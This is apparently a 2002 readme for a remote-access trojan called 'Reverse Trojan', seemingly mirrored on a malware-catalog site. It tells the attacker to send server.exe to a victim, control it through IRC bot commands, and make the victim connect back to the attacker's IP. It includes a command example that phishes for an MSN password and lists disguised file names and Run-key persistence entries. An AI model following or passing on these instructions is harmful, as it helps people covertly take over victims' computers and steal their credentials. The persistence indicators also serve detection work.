by Satan_addict
Written in Delphi
Compressed with UPX
Released on july 13, 2002
*////////////////////////////////////* ///*------------------------------*/// ///| REVERSE TROJAN v1.00 BETA 6 |/// ///*------------------------------*/// *////////////////////////////////////* **********Beta Version*************** Release date: 13-07-2002 ------------- Author: Satan_addict ------- Files: ------ server.exe reverse station.exe readme1st.txt << PREVIOUS NOTES: >> The part u should open in your PC is the 'Reverse Station.exe', the one u send to the vic is the 'server.exe' part! U can open how many servers as you want in the victims computer, because they are, infact, all clients! << INSTRUCTIONS: >> 1st) Edit the server (the server editor is in the client part) and send it to the vic; 2nd) Open the 'Reverse Station' and turn it on; 3rd) Go to the irc channel u setted the server and query the vic; Write: !identpwd (pwd= the client pwd) 4th) In the 'Reverse Station' click the '!' button and get your ip; 5th) Go back to the vic window (irc) and write: !con127.0.0.1 <- your ip there; 6th) By now the vic must have connected 2 you! << IRC BOT COMMANDS >> (never use caps, no spaces either) !help (list of all commands) !ident(password) ex: !ident12345 !con(ip) ex: !con127.0.0.1 !info !join(#channel) ex: !join#satanzcrew !say(#channel:text) ex: !say#satanzcrew:i like SatanzCrew a lot! !part(#channel) ex: !part#satanzcrew !quit !msg(text) ex: !msgPlease insert your MSN password for confirmation? (then u get victims answer!) !restart (this will restart the server use it if your having problems) Satan_addict ~~~~ Satanzcrew rulez ~~~~ Server: C:\WINDOWS\SYSTEM\DirectX3D.exe C:\WINDOWS\SYSTEM\msgsrv16.exe size: 687.106 bytes startup: HKCU\Software\Microsoft\Windows\CurrentVersion\Run "DirectX 3D Service" HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Service386Shell"MegaSecurity